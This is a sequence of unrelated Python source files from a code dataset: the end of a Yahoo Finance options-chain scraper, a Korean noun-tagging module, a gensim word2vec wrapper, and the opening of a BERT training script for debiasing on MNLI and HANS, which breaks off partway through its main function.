Currently an input to the function, but maybe have \n\t## some default if this is not specified by the user.\n\t#target_dir='/home/jjwalker/Desktop/finance/data/options'\n target_dir=input_path\n\t\n\t## If the optional scrape flag has False selected, then read from file\n\t## (input_path must contain a properly formated option chain.)\n if scrape==False:\n try:\n\t\t\t## Here is how to open it back up again.\n\t\t\t#bs_json=pd.io.json.read_json(input_path)\n bs_json=pd.read_json(input_path)\n\t\t\t\n\t\t\t#pframes=[pd.DataFrame(\n\t\t\t#\tchain['optionChain']['result'][0]['options'][0]['puts']) \n\t\t\t#\tfor chain in bs_json[0].iloc[:]]\n\t\t\t#cframes=[pd.DataFrame(\n\t\t\t#\tchain['optionChain']['result'][0]['options'][0]['calls']) \n\t\t\t#\tfor chain in bs_json[0].iloc[:]]\n pframes=[pd.DataFrame(chain[0]['options'][0]['puts']) \n for chain in bs_json[1][:]]\n cframes=[pd.DataFrame(chain[0]['options'][0]['calls'] )\n for chain in bs_json[1][:]]\n \n df_puts=pd.concat(pframes)\n df_calls=pd.concat(cframes)\n\t\t\t## merge on strike:\n df=df_calls.merge(df_puts,how='outer',on=['expiration','strike'],suffixes=('_c','_p'))\n\t\t\t#df.expiration=df.expiration.apply(lambda d: datetime.utcfromtimestamp(d))\t\n\t\t\t#df.lastTradeDate_c=df.lastTradeDate_c.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t\t#df.lastTradeDate_p=df.lastTradeDate_p.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t\t#df.set_index(['expiration','strike'],inplace=True)\n\t\t\t#df=df.reindex(pd.MultiIndex.from_product(\n\t\t\t#\t[df.index.levels[0],df.index.levels[1].unique()],\n\t\t\t#\tnames=['expiration','strike']),fill_value=np.NaN)\t\n\t\t\n\t\t\t## Need expiry dates as an output\n\t\t\t#expiry_dates=bs_json[0].iloc[0]['optionChain']['result'][0]['expirationDates']\n expiry_dates=bs_json[1][0][0]['expirationDates']\n\n\t\t\t## Also need spot price as an output\n\t\t\t#spot_price=bs_json[0].iloc[0]['optionChain']['result'][0]['quote'][\n\t\t\t#\t'regularMarketPrice']\n spot_price=bs_json[1][0][0]['quote']['regularMarketPrice']\n\t\t\t## The time when the data was queried; this should be in eastern time\n\t\t\t## so no need for any conversions.\n\t\t\t#tquery=bs_json[0].iloc[0]['optionChain']['result'][0]['quote']['regularMarketTime']\n tquery=bs_json[1][0][0]['quote']['regularMarketTime']\n ## not really tnow, this was the time when the data was queried. \n\t\t\t## Using this as the output for tnow.\n\t\t\t## Might be interesting to get the market time for all the other \n\t\t\t## chains (.iloc[0] to highest row number) to see how different the \n\t\t\t## times are. 
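            ## Editor's note (added; not in the original module): tquery and the
            ## entries of expiry_dates returned by Yahoo are unix timestamps in
            ## seconds, so a quick hypothetical sanity check while debugging could be:
            ##     [datetime.utcfromtimestamp(t) for t in expiry_dates[:3]]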
It takes some time to access each chain, causing a delay\n tnow=pd.to_datetime(datetime.utcfromtimestamp(tquery))\n\t\t\n\t\t## throw error if the file does not exist\n except: #FileNotFoundError\n print('File not found, check filename, directory')\n tnow=''\n expiry_dates=''\n spot_price=''\n df=''\n\t\t\n\t\t\n\t\t\n\t\n\t## If no datafile is given, query the data from yahoo website\n else:\n\n\t\t## First get expiry dates.\n\t\t## use query1.stuff or query2?\n url_string=('https://query1.finance.yahoo.com/v7/finance/options/'+ticker)\n\t\t#bs_json = pd.io.json.read_json(url_string)\n bs_json = pd.read_json(url_string)\n\t\t## found through trial and error, hopefully all yahoo option chains \n\t\t## look like this\n entries=bs_json['optionChain']['result'][0].keys()\n\t\t## We should keep the expiry dates, maybe output the array of expiry \n\t\t## dates\n\t\t#expiry_dates=bs_json['optionChain']['result'][0][entries[1]]\n expiry_dates=bs_json['optionChain']['result'][0]['expirationDates']\n \n\t\t## Kelly's idea:\n\t\t## initialize an empty dataframe with len(expiry_dates) number of rows;\n\t\t## each row will contain the json result for a given expiry date\n\t\t## or, append to list?\n\t\t## Is this fastest, or is there a better way?\n option_chain_multi=[]\n\n for date in expiry_dates:\n url_date=url_string+'?date='+str(date)\n\t\t\t#option_chain_multi.append(pd.io.json.read_json(url_date))\n option_chain_multi.append(pd.read_json(url_date))\n\n\t\n\t\t## Near here:\n\t\t## Get the risk free rate?\n\t\t## (scrape wallstreetjournal? \n\t\t## 'https://www.wsj.com/market-data/bonds/treasuries'\n\n\t\t## need the date and time if we want to write to a csv file.\n\t\t## Get this immediately after pinging the website.\n tnow=pd.to_datetime('today').now()\n\t\n\t\t## now make a dataframe, and save it\n option_chain=pd.DataFrame(np.squeeze(option_chain_multi))\t\n #option_chain=pd.concat(option_chain_multi).reset_index()\n\t\t##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t## Now, perform the necessary work to write to file.\n\t\t## convert local time to utc.\n\t\t#tnow=?\n #tnow=tnow.tz_localize(timezone).tz_convert('utc')\n\t\t## in practice though, we will just assume all times (for stock purposes) \n\t\t## to be in eastern time, so just convert our local time to that\n tnow=tnow.tz_localize(timezone).tz_convert('US/Eastern')\n\t\t## the time to expiration is today's date subtracted from the future date;\n\t\t## get the result in units of days!\n\t\t## Maybe texp belongs in a script or function where this function is \n\t\t## called from\n\t\t#texp=(pd.Timestamp(exp_date).tz_localize('US/Eastern')-pd.Timestamp(tnow)\n\t\t#\t)/np.timedelta64(1,'D')\t\t\n\t\t## code to check the current date, and make a folder for today's date if \n\t\t## it does not exist.\n\t\t## this next line can be the default if no path is given?\n\t\t#path=os.getcwd()+time.strftime(\"/%Y/%m/%d\")\n\t\t## in future, change target_dir to the path variable, given as an input to\n\t\t## the function\n path=target_dir+tnow.strftime(\"/%Y/%m/%d\")\n\t\t## the line below is apparently for python 3!\n\t\t#os.makedirs(path, exist_ok=True)\n\t\t## Workaround for python 2\n if not os.path.exists(path):\n os.makedirs(path)\n\t\t## convert tnow, the time at which the data was retrieved, into a \n\t\t## string for a filename.\n tnow_str=tnow.strftime(\"%Y_%m_%d_%H_%M\")\n\t\n filename=path+'/'+tnow_str+'_'+ticker+'_full_chain'+'.txt'\n\t\n 
option_chain.to_json(filename)\n\t\t##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t\t## Clean up the data for output variables of this function!\n\t\t#strikes=bs_json['optionChain']['result'][0][entries[2]]\n\t\t## could also use midpoint of bid ask?\n\t\t#spot_price=option_chain[0][0]['optionChain']['result'][0]['quote'][\n\t\t#\t'regularMarketPrice']\n #spot_price=option_chain.iloc[0]['result'][0]['quote'][\n # 'regularMarketPrice']\n spot_price=option_chain[1][0][0]['quote']['regularMarketPrice']\n\n\t\n\n\t\t## How to best make a dataframe from the option_chain? (clean it up)\n\t\t#option_chain[0][0]['optionChain']['result'][0]['options'][0]['puts']\n\t\n\t\t## Maybe this is the best way to concatenate the dataframes?\n\t\t## DO NOT INCLUDE OPTION CHAINS THAT HAVE NO DATA!\n pframes=[pd.DataFrame(\n\t\t\tchain['optionChain']['result'][0]['options'][0]['puts']) \n\t\t\tfor chain in option_chain_multi]\n\t\t## set index to strike for each dataframe in list? What is best way?\n\t\t#for df in pframes:\n\t\t#\tif 'strike' in df.columns:\n\t\t#\t\tdf.set_index(['expiration','strike'],inplace=True)\n\n\t\n cframes=[pd.DataFrame(\n\t\t\tchain['optionChain']['result'][0]['options'][0]['calls']) \n\t\t\tfor chain in option_chain_multi]\n\t\n\t\t## make a multi index first?\n\t\t#strike=df_calls.strike.unique()\n\t\t#index=pd.MultiIndex.from_product([map(str,expiry_dates),strike],\n\t\t#\tnames=[expiry_dates,strike])\n\n\t\t## I should make it so that the index level after expiry dates is strike\n\t\t## price\n df_puts=pd.concat(pframes,ignore_index=True)\n\t\t## is now a good time to convert expiration column to pandas datetime?\n\t\t#df_puts.set_index(['expiration','strike'],inplace=True)\n\t\t#df_puts = pd.concat(pframes, keys=expiry_dates,names=['expiry_date','strike'])\n\t\t## do the same for calls:\n df_calls=pd.concat(cframes,ignore_index=True)\n\t\t#df_calls.set_index(['expiration','strike'],inplace=True)\n\n\t\t## New method: Make one dataframe for calls and puts\n\t\t## merge on strike:\n df=df_calls.merge(df_puts,how='outer',on=['expiration','strike'],suffixes=('_c','_p'))\n\t\t## Hmm, having problems with this too...\n\t\t#df.expiration=df.expiration.apply(lambda d: datetime.utcfromtimestamp(d))\t\n\t\t## Last trade dates may have NaN entries, so clean these outside of here?\n\t\t#df.lastTradeDate_c=df.lastTradeDate_c.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t#df.lastTradeDate_p=df.lastTradeDate_p.apply(lambda d: datetime.utcfromtimestamp(d))\n\t\t#df.set_index(['expiration','strike'],inplace=True)\n\t\t#df=df.reindex(pd.MultiIndex.from_product(\n\t\t#\t[df.index.levels[0],df.index.levels[1].unique()],\n\t\t#\tnames=['expiration','strike']),fill_value=np.NaN)\n\n\n\t\t## old method:\n\t\t#df_calls = pd.concat(cframes, keys=expiry_dates)\n\t\t## should I join the two dataframes, calls and puts?\n\t\t## can index the different expiration dates by key:\n\t\t## (You will likely use this functionality in scripts that call this\n\t\t## function) \n\t\t#df_keys.loc[expiry_dates[0]] \n\n\t\t## should I put into the dataframe: tnow, time to expiration for each\n\t\t## option, and the spot price?\n\t\t## Need also risk-free rate from scraped bond data for each expiry\n\t\t## (separate bond-scraper from this function?)\n\n\n\t\t## should expiry dates be transformed to a regular datetime?\n\t\t#datetime.utcfromtimestamp(expiry_dates)+timedelta(hours=16)\n\n return 
tnow,expiry_dates,spot_price,df\n\n","repo_name":"jjwalkerwvu/finance","sub_path":"codes/data_cleaning/yahoo_option_chain_multi_exp.py","file_name":"yahoo_option_chain_multi_exp.py","file_ext":"py","file_size_in_byte":11438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27659266436","text":"# Module that handles substantives (nouns, pronouns, numerals)\nfrom module.jamostoolkit import *\nfrom .che_eon_list import *\nfrom module.basic import namePumsa\n\ndef nameNoun(l):\n    pumsalist = []\n    for i in range(0, len(l)):\n        if (isinstance(l[i], list)):\n            continue\n        word = l[i]\n        check = JamosSeparator(word) # use the initial-consonant (chosung) separation module (jamostoolkit)\n        check.run() # run the chosung separation\n        chosung = check.get()[0] # method that fetches the separation result\n        if chosung == 'ㄱ':\n            pumsalist = alist\n        elif chosung == 'ㄴ':\n            pumsalist = blist\n        elif chosung == 'ㄷ':\n            pumsalist = clist\n        elif chosung == 'ㄹ':\n            pumsalist = dlist\n        elif chosung == 'ㅁ':\n            pumsalist = elist\n        elif chosung == 'ㅂ':\n            pumsalist = flist\n        elif chosung == 'ㅅ':\n            pumsalist = glist\n        elif chosung == 'ㅇ':\n            pumsalist = hlist\n        elif chosung == 'ㅈ':\n            pumsalist = ilist\n        elif chosung == 'ㅊ':\n            pumsalist = jlist\n        elif chosung == 'ㅋ':\n            pumsalist = klist\n        elif chosung == 'ㅌ':\n            pumsalist = llist\n        elif chosung == 'ㅍ':\n            pumsalist = mlist\n        elif chosung == 'ㅎ':\n            pumsalist = nlist\n\n        if l[i] in pumsalist:\n            templist = [l[i], '명사']\n            del l[i]\n            l.insert(i, templist)\n    return l\n\ndef processCheEon(l):\n    l = namePumsa(l, susaList, '수사')\n    l = namePumsa(l, daemyungsaList, '대명사')\n    l = nameNoun(l)\n    return l\n","repo_name":"oronaminc/KR-Parts-_of_speech-Analyzer","sub_path":"module/che_eon/che_eon.py","file_name":"che_eon.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7907309109","text":"# Word embeddings for input to seq2seq\n# Cheng Shen\n# May 21st 2019\n\n# Reference:\n# https://towardsdatascience.com/implementing-word2vec-in-pytorch-skip-gram-model-e6bae040d2fb\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport numpy as np\nimport re\n\nfrom gensim.test.utils import datapath\nfrom gensim.models.word2vec import LineSentence\nfrom gensim.sklearn_api import W2VTransformer\nfrom gensim.models import Word2Vec\n\nEMBEDDING_DIM = 500\nWINDOW_SIZE = 2 # The words in range (-WINDOW_SIZE, 0, WINDOW_SIZE) are included\nEOS = \"*end*\"\nSTART = \"*start*\"\n\n\ncomputing_device = torch.device(\"cpu\")\nif torch.cuda.is_available():\n    print(\"Using CUDA\")\n    computing_device = torch.device(\"cuda:1\") # CUDA device may be different\n\nclass word2vec:\n    def __init__(self):\n        self.model = Word2Vec(size=EMBEDDING_DIM, min_count=0, seed=1, workers=4)\n\n    def fit(self, filename=\"/home/aufish/Documents/19SP/NeuralBot_2/Data/cornell_data/pure_movie_lines.txt\"):\n        essays1 = LineSentence(datapath(filename))\n        self.model.build_vocab(essays1)\n        essays2 = LineSentence(datapath(filename))\n        self.model.train(essays2, total_examples=self.model.corpus_count, epochs=5)\n\n    def transform(self, sentence):\n        if type(sentence) == str:\n            sentence = sentence.split(\" \")\n        # sentence is a list of words\n        result = []\n        for word in sentence:\n            word = word.lower().strip().strip(\",.!?\\\"\\'()\")\n            if word == \"\":\n                continue\n            result.append(word)\n\n        return torch.tensor([self.model.wv[word] for word in result], device=computing_device)\n\n    def transform_pair(self, sentence1, sentence2):\n        return (self.transform(sentence1), 
self.transform(sentence2))\n\n def save(self, filename=\"word2vec.model\"):\n self.model.save(filename)\n\n def load(self, filename=\"word2vec.model\"):\n self.model = Word2Vec.load(filename)","repo_name":"SCAuFish/Neural-Chatbot","sub_path":"word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12025206928","text":"\"\"\"\nScript to train BERT on MNLI with our loss function\n\nModified from the old \"run_classifier\" script from\nhttps://github.com/huggingface/pytorch-transformer\n\nGenerally I tried not to change much, but I did add variable length sequence encoding\nand parallel pre-processing for the sake of performance\n\nFair warning, I probably broke some of the multi-gpu stuff, I have only tested the single GPU version\n\"\"\"\n\nimport argparse\nimport json\nimport logging\nimport os\nimport random\nfrom collections import namedtuple\nfrom os.path import join, exists\nfrom typing import List, Dict, Iterable\n\nimport numpy as np\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\nfrom pytorch_pretrained_bert.modeling import BertConfig, WEIGHTS_NAME, CONFIG_NAME\nfrom pytorch_pretrained_bert.optimization import BertAdam, warmup_linear\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom torch.nn import CrossEntropyLoss\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, Dataset, Sampler\nfrom tqdm import trange, tqdm\n\nfrom debias import config\nfrom debias.bert import clf_debias_loss_functions\nfrom debias.bert.bert_with_debias_loss import BertWithDebiasLoss\nfrom debias.bert.clf_debias_loss_functions import *\nfrom debias.utils import py_utils\nfrom debias.utils.process_par import Processor, process_par\n\n# Its a hack, but I didn't want a tensorflow dependency be required to run this code, so\n# for now we just copy-paste MNLI loading stuff from debias/datasets/mnli\n\nHANS_URL = \"https://raw.githubusercontent.com/tommccoy1/hans/master/heuristics_evaluation_set.txt\"\n# Taken from the GLUE script\nMNLI_URL = \"https://firebasestorage.googleapis.com/v0/b/mtl-sentence-representations.appspot.com/o/data%2FMNLI.zip?alt=media&token=50329ea1-e339-40e2-809c-10c40afff3ce\"\n\nMNLI_BIAS_DRIVE_IDS = {\n \"train\": \"1ctP0T93F02IjWh4m1CMUdrSRQnoxEg6f\",\n \"dev\": \"10PcUMd6xqXArwRPCkIYjIwdL59f2p5TO\",\n \"hans\": \"1DEQaUmwfTgK6kSHqXj5phySPYwUq-52S\",\n}\n\nNLI_LABELS = [\"contradiction\", \"entailment\", \"neutral\"]\nNLI_LABEL_MAP = {k: i for i, k in enumerate(NLI_LABELS)}\n\n\nTextPairExample = namedtuple(\"TextPairExample\", [\"id\", \"hypothesis\", \"premise\", \"label\"])\n\n\ndef load_hans(n_samples=None) -> List[TextPairExample]:\n out = []\n logging.info(\"Loading hans...\")\n src = join(config.HANS_SOURCE, \"heuristics_evaluation_set.txt\")\n if not exists(src):\n logging.info(\"Downloading source to %s...\" % config.HANS_SOURCE)\n py_utils.download_to_file(HANS_URL, src)\n\n with open(src, \"r\") as f:\n f.readline()\n lines = f.readlines()\n\n if n_samples is not None:\n lines = np.random.RandomState(16349 + n_samples).choice(lines, n_samples, replace=False)\n\n for line in lines:\n parts = line.split(\"\\t\")\n label = parts[0]\n if label == \"non-entailment\":\n label = 0\n elif label == \"entailment\":\n label = 1\n else:\n raise RuntimeError()\n s1, s2, pair_id = parts[5:8]\n out.append(TextPairExample(pair_id, s1, s2, label))\n return out\n\n\ndef 
ensure_mnli_is_downloaded():\n mnli_source = join(config.GLUE_SOURCE, \"MNLI\")\n if exists(mnli_source) and len(os.listdir(mnli_source)) > 0:\n return\n py_utils.download_zip(\"MNLI\", MNLI_URL, config.GLUE_SOURCE)\n\n\ndef load_mnli(is_train, sample=None) -> List[TextPairExample]:\n ensure_mnli_is_downloaded()\n if is_train:\n filename = join(config.GLUE_SOURCE, \"MNLI\", \"train.tsv\")\n else:\n filename = join(config.GLUE_SOURCE, \"MNLI\", \"dev_matched.tsv\")\n\n logging.info(\"Loading mnli \" + (\"train\" if is_train else \"dev\"))\n with open(filename) as f:\n f.readline()\n lines = f.readlines()\n\n if sample:\n lines = np.random.RandomState(26096781 + sample).choice(lines, sample, replace=False)\n\n out = []\n for line in lines:\n line = line.split(\"\\t\")\n out.append(TextPairExample(line[0], line[8], line[9], NLI_LABEL_MAP[line[-1].rstrip()]))\n return out\n\n\ndef load_bias(dataset_name) -> Dict[str, np.ndarray]:\n \"\"\"Load dictionary of example_id->bias where bias is a length 3 array\n of log-probabilities\"\"\"\n\n if dataset_name not in MNLI_BIAS_DRIVE_IDS:\n raise ValueError(dataset_name)\n bias_src = join(config.MNLI_WORD_OVERLAP_BIAS, dataset_name + \".pkl\")\n if not exists(bias_src):\n logging.info(\"Downloading MNLI bias to %s...\" % bias_src)\n py_utils.download_from_drive(MNLI_BIAS_DRIVE_IDS[dataset_name], bias_src)\n\n bias = py_utils.load_pickle(bias_src)\n for k, v in bias.items():\n # Convert from entail vs non-entail to 3-way classes by splitting non-entail\n # to neutral and contradict\n bias[k] = np.array([\n v[0] - np.log(2.),\n v[1],\n v[0] - np.log(2.),\n ])\n return bias\n\n\nclass InputFeatures(object):\n \"\"\"A single set of features of data.\"\"\"\n\n def __init__(self, example_id, input_ids, segment_ids, label_id, bias):\n self.example_id = example_id\n self.input_ids = input_ids\n self.segment_ids = segment_ids\n self.label_id = label_id\n self.bias = bias\n\n\nclass ExampleConverter(Processor):\n def __init__(self, max_seq_length, tokenizer):\n self.max_seq_length = max_seq_length\n self.tokenizer = tokenizer\n\n def process(self, data: Iterable):\n features = []\n tokenizer = self.tokenizer\n max_seq_length = self.max_seq_length\n\n for example in data:\n tokens_a = tokenizer.tokenize(example.hypothesis)\n\n tokens_b = None\n if example.premise:\n tokens_b = tokenizer.tokenize(example.premise)\n # Modifies `tokens_a` and `tokens_b` in place so that the total\n # length is less than the specified length.\n # Account for [CLS], [SEP], [SEP] with \"- 3\"\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # Account for [CLS] and [SEP] with \"- 2\"\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[:(max_seq_length - 2)]\n\n tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n if tokens_b:\n tokens += tokens_b + [\"[SEP]\"]\n segment_ids += [1] * (len(tokens_b) + 1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n features.append(\n InputFeatures(\n example_id=example.id,\n input_ids=np.array(input_ids),\n segment_ids=np.array(segment_ids),\n label_id=example.label,\n bias=None\n ))\n return features\n\n\nclass InputFeatureDataset(Dataset):\n\n def __init__(self, examples: List[InputFeatures]):\n self.examples = examples\n\n def __getitem__(self, index):\n return self.examples[index]\n\n def __len__(self):\n return len(self.examples)\n\n\ndef collate_input_features(batch: List[InputFeatures]):\n max_seq_len = max(len(x.input_ids) for x in batch)\n sz = len(batch)\n\n input_ids 
= np.zeros((sz, max_seq_len), np.int64)\n segment_ids = np.zeros((sz, max_seq_len), np.int64)\n mask = torch.zeros(sz, max_seq_len, dtype=torch.int64)\n for i, ex in enumerate(batch):\n input_ids[i, :len(ex.input_ids)] = ex.input_ids\n segment_ids[i, :len(ex.segment_ids)] = ex.segment_ids\n mask[i, :len(ex.input_ids)] = 1\n\n input_ids = torch.as_tensor(input_ids)\n segment_ids = torch.as_tensor(segment_ids)\n label_ids = torch.as_tensor(np.array([x.label_id for x in batch], np.int64))\n if batch[0].bias is None:\n return input_ids, mask, segment_ids, label_ids\n\n bias = torch.tensor([x.bias for x in batch])\n return input_ids, mask, segment_ids, label_ids, bias\n\n\nclass SortedBatchSampler(Sampler):\n def __init__(self, data_source, batch_size, seed):\n super().__init__(data_source)\n self.data_source = data_source\n self.batch_size = batch_size\n self.seed = seed\n if batch_size == 1:\n raise NotImplementedError()\n self._epoch = 0\n\n def __iter__(self):\n rng = np.random.RandomState(self._epoch + 601767 + self.seed)\n n_batches = len(self)\n batch_lens = np.full(n_batches, self.batch_size, np.int32)\n\n # Randomly select batches to reduce by size 1\n extra = n_batches*self.batch_size - len(self.data_source)\n batch_lens[rng.choice(len(batch_lens), extra, False)] -= 1\n\n batch_ends = np.cumsum(batch_lens)\n batch_starts = np.pad(batch_ends[:-1], [1, 0], \"constant\")\n\n if batch_ends[-1] != len(self.data_source):\n print(batch_ends)\n raise RuntimeError()\n\n bounds = np.stack([batch_starts, batch_ends], 1)\n rng.shuffle(bounds)\n\n for s, e in bounds:\n yield np.arange(s, e)\n\n def __len__(self):\n return (len(self.data_source) + self.batch_size - 1) // self.batch_size\n\n\ndef build_train_dataloader(data: List[InputFeatures], batch_size, seed, sorted):\n if sorted:\n data.sort(key=lambda x: len(x.input_ids))\n ds = InputFeatureDataset(data)\n sampler = SortedBatchSampler(ds, batch_size, seed)\n return DataLoader(ds, batch_sampler=sampler, collate_fn=collate_input_features)\n else:\n ds = InputFeatureDataset(data)\n return DataLoader(ds, batch_size=batch_size, sampler=RandomSampler(ds), collate_fn=collate_input_features)\n\n\ndef build_eval_dataloader(data: List[InputFeatures], batch_size):\n ds = InputFeatureDataset(data)\n return DataLoader(ds, batch_size=batch_size, sampler=SequentialSampler(ds), collate_fn=collate_input_features)\n\n\ndef convert_examples_to_features(\n examples: List[TextPairExample], max_seq_length, tokenizer, n_process=1):\n converter = ExampleConverter(max_seq_length, tokenizer)\n return process_par(examples, converter, n_process, chunk_size=2000, desc=\"featurize\")\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. 
This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef simple_accuracy(preds, labels):\n return (preds == labels).mean()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--bert_model\", default=\"bert-base-uncased\", type=str,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n \"bert-base-multilingual-cased, bert-base-chinese.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model predictions and checkpoints will be written.\")\n parser.add_argument(\"--cache_dir\",\n default=\"\",\n type=str,\n help=\"Where do you want to store the pre-trained models downloaded from s3\")\n parser.add_argument(\"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_train\",\n action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\",\n action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--train_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for training.\")\n parser.add_argument(\"--seed\",\n default=None,\n type=int,\n help=\"Seed for randomized elements in the training\")\n parser.add_argument(\"--eval_batch_size\",\n default=16,\n type=int,\n help=\"Total batch size for eval.\")\n parser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--num_train_epochs\",\n default=3.0,\n type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\",\n default=0.1,\n type=float,\n help=\"Proportion of training to perform linear learning rate warmup for. \"\n \"E.g., 0.1 = 10%% of training.\")\n parser.add_argument(\"--no_cuda\",\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n parser.add_argument('--gradient_accumulation_steps',\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n parser.add_argument('--fp16',\n action='store_true',\n help=\"Whether to use 16-bit float precision instead of 32-bit\")\n parser.add_argument('--loss_scale',\n type=float, default=0,\n help=\"Loss scaling to improve fp16 numeric stability. 
Only used when fp16 set to True.\\n\"\n                             \"0 (default value): dynamic loss scaling.\\n\"\n                             \"Positive power of 2: static loss scaling value.\\n\")\n\n    ## Our arguments\n    parser.add_argument(\"--mode\", choices=[\"bias_product\", \"none\", \"learned_mixin\", \"reweight\"],\n                        default=\"learned_mixin\", help=\"Kind of debiasing method to use\")\n    parser.add_argument(\"--penalty\", type=float, default=0.03,\n                        help=\"Penalty weight for the learn_mixin model\")\n    parser.add_argument(\"--n_processes\", type=int, default=4,\n                        help=\"Processes to use for pre-processing\")\n    parser.add_argument(\"--debug\", action=\"store_true\")\n    parser.add_argument(\"--sorted\", action=\"store_true\",\n                        help='Sort the data so most batches have the same input length,'\n                             ' makes things about 2x faster. Our experiments did not actually'\n                             ' use this in the end (not sure if it makes a difference) so '\n                             'it is off by default.')\n\n    args = parser.parse_args()\n\n    py_utils.add_stdout_logger()\n\n    if args.mode == \"none\":\n        loss_fn = clf_debias_loss_functions.Plain()\n    elif args.mode == \"reweight\":\n        loss_fn = clf_debias_loss_functions.ReweightByInvBias()\n    elif args.mode == \"bias_product\":\n        loss_fn = clf_debias_loss_functions.BiasProduct()\n    elif args.mode == \"learned_mixin\":\n        loss_fn = clf_debias_loss_functions.LearnedMixin(args.penalty)\n    else:\n        raise RuntimeError()\n\n    output_dir = args.output_dir\n\n    if args.do_train:\n        if exists(output_dir):\n            if len(os.listdir(output_dir)) > 0:\n                raise ValueError(\"Output dir exists and is non-empty\")\n        else:\n            os.makedirs(output_dir)\n\n    print(\"Saving model to %s\" % output_dir)\n\n    if args.local_rank == -1 or args.no_cuda:\n        device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n        n_gpu = torch.cuda.device_count()\n    else:\n        torch.cuda.set_device(args.local_rank)\n        device = torch.device(\"cuda\", args.local_rank)\n        n_gpu = 1\n        # Initializes the distributed backend which will take care of synchronizing nodes/GPUs\n        torch.distributed.init_process_group(backend='nccl')\n    logging.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\n        device, n_gpu, bool(args.local_rank != -1), args.fp16))\n\n    if args.gradient_accumulation_steps < 1:\n        raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n            args.gradient_accumulation_steps))\n\n    args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps\n\n    if args.seed is not None:\n        random.seed(args.seed)\n        np.random.seed(args.seed)\n        torch.manual_seed(args.seed)\n        if n_gpu > 0:\n            torch.cuda.manual_seed_all(args.seed)\n    \n    if not args.do_train and not args.do_eval:\n        raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")\n\n    if os.path.exists(output_dir) and os.listdir(output_dir) and args.do_train:\n        raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(output_dir))\n    if not os.path.exists(output_dir):\n        os.makedirs(output_dir)\n\n    # It's way too easy to forget if this is being set by a command line flag\n    if \"-uncased\" in args.bert_model:\n        do_lower_case = True\n    elif \"-cased\" in args.bert_model:\n        do_lower_case = False\n    else:\n        raise NotImplementedError(args.bert_model)\n\n    tokenizer = BertTokenizer.from_pretrained(args.bert_model, do_lower_case=do_lower_case)\n\n    num_train_optimization_steps = None\n    train_examples = None\n    if args.do_train:\n        train_examples = load_mnli(True, 2000 if args.debug else None)\n        num_train_optimization_steps = int(\n            len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps) * args.num_train_epochs\n
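# Side note: a standalone restatement of the optimizer-step arithmetic just above, for clarity.
# The helper and the example numbers are illustrative, not taken from this run.
def estimate_optimization_steps(n_examples, batch_size, grad_accum_steps, epochs):
    # One optimizer step consumes batch_size * grad_accum_steps examples.
    return int(n_examples / batch_size / grad_accum_steps) * epochs

# e.g. 392,702 examples at batch size 32, no accumulation, 3 epochs:
assert estimate_optimization_steps(392702, 32, 1, 3) == 36813  # 12,271 steps per epoch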
